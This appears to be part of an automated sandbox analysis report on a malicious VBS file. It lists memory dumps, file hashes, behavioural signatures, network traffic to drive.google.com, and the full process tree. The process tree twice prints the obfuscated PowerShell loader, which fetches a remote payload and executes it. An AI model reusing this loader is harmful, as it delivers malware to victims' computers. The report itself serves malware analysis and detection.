memory/1104-291-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/1104-292-0x0000000002BF0000-0x0000000002C70000-memory.dmp

memory/276-293-0x0000000003010000-0x0000000003011000-memory.dmp

memory/276-294-0x00000000069D0000-0x000000000A678000-memory.dmp

memory/276-295-0x0000000077BE0000-0x0000000077D89000-memory.dmp

memory/276-296-0x0000000073C20000-0x00000000741CB000-memory.dmp

memory/276-298-0x0000000077DD0000-0x0000000077EA6000-memory.dmp

memory/276-297-0x0000000002EA0000-0x0000000002EE0000-memory.dmp

memory/1860-299-0x0000000077BE0000-0x0000000077D89000-memory.dmp

memory/1860-300-0x0000000077E06000-0x0000000077E07000-memory.dmp

memory/1860-301-0x0000000077DD0000-0x0000000077EA6000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d8ee47325b962698fe53acb4209bf09e
SHA1 a505e201cecffee4372c9473b59b4e66a3ad9604
SHA256 6d56bb315c8f6e7193648bd5f355b2cd064e23c0fbbb1ab1a986dd79ef23d7ff
SHA512 084429cf07583b7808c9ee60ae11e7a56dd2c167d975de58c50c107090476afa91e7e1ac0773d721bd50a0078228f053a3e0bb8f785058e31985e0c16121eda2

C:\Users\Admin\AppData\Local\Temp\TarA0C3.tmp

MD5 435a9ac180383f9fa094131b173a2f7b
SHA1 76944ea657a9db94f9a4bef38f88c46ed4166983
SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

memory/1860-323-0x0000000000420000-0x0000000001482000-memory.dmp

memory/1860-324-0x0000000077DD0000-0x0000000077EA6000-memory.dmp

memory/1860-325-0x0000000001490000-0x0000000005138000-memory.dmp

memory/1860-327-0x0000000077BE0000-0x0000000077D89000-memory.dmp

memory/1104-329-0x000007FEF6080000-0x000007FEF6A1D000-memory.dmp

memory/1860-328-0x0000000077DD0000-0x0000000077EA6000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-02 09:59

Reported

2024-04-02 10:01

Platform

win10v2004-20231215-en

Max time kernel

91s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4172 -ip 4172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 2464

Network

Country Destination Domain Proto
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 82.177.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.178.1:443 drive.usercontent.google.com tcp
US 138.91.171.81:80 tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 24.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 152.33.115.104.in-addr.arpa udp
US 8.8.8.8:53 202.110.86.104.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 8fc1c8f641a168a2076834282473aa40
SHA1 df00a27308ecf57d551fbbc20f20c2414e1b1104
SHA256 61c36dfe0292d9f4b951ad4548dcbd732597bbcf8f623d15919cde913455a568
SHA512 28b96dff46c6684394e68049e0b6278c6811264a44b2ee12a89c800b77c85559d56388c5024dc890ed4092ab6d2fff921b5618efd8ea6226255c047f5df23aaf

C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

MD5 c3b48e90f811fd16ef69026fdc4a2e50
SHA1 df10a00a6d68af91801d446d669b46e69fe8cc56
SHA256 4ebcc3f20194ee869ed413b7bbe7fc466ddced60b792e09b9ec70b906984ff0f
SHA512 7b6751535b2d2237d207236327f64f5281f02f2b70d08abc3a71f30ba4e0520f6f794eb275e75d7b1babf153d9d528eadf2ab07d1616fad17792ada0c2c53eda

memory/1572-249-0x000002B46FA00000-0x000002B46FA22000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fki0viq1.cuh.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1572-254-0x00007FF813AE0000-0x00007FF8145A1000-memory.dmp

memory/1572-255-0x000002B46FA40000-0x000002B46FA50000-memory.dmp

memory/1572-256-0x000002B4707D0000-0x000002B4707F6000-memory.dmp

memory/1572-257-0x000002B470870000-0x000002B470884000-memory.dmp

memory/1572-258-0x000002B46FA40000-0x000002B46FA50000-memory.dmp

memory/4172-260-0x00000000748A0000-0x0000000075050000-memory.dmp

memory/4172-259-0x0000000002470000-0x00000000024A6000-memory.dmp

memory/4172-261-0x0000000002550000-0x0000000002560000-memory.dmp

memory/4172-262-0x0000000002550000-0x0000000002560000-memory.dmp

memory/4172-263-0x0000000004EE0000-0x0000000005508000-memory.dmp

memory/4172-264-0x0000000005510000-0x0000000005532000-memory.dmp

memory/4172-265-0x00000000056B0000-0x0000000005716000-memory.dmp

memory/4172-271-0x0000000005750000-0x00000000057B6000-memory.dmp

memory/4172-276-0x00000000059B0000-0x0000000005D04000-memory.dmp

memory/4172-277-0x0000000005D90000-0x0000000005DAE000-memory.dmp

memory/4172-278-0x0000000005DD0000-0x0000000005E1C000-memory.dmp

memory/4172-279-0x00000000075F0000-0x0000000007C6A000-memory.dmp

memory/4172-280-0x0000000006380000-0x000000000639A000-memory.dmp

memory/4172-281-0x0000000007010000-0x00000000070A6000-memory.dmp

memory/4172-282-0x0000000006FB0000-0x0000000006FD2000-memory.dmp

memory/4172-283-0x0000000008220000-0x00000000087C4000-memory.dmp

memory/4172-284-0x0000000006FE0000-0x0000000007002000-memory.dmp

memory/4172-285-0x0000000007280000-0x0000000007294000-memory.dmp

memory/4172-286-0x00000000748A0000-0x0000000075050000-memory.dmp

memory/1572-289-0x00007FF813AE0000-0x00007FF8145A1000-memory.dmp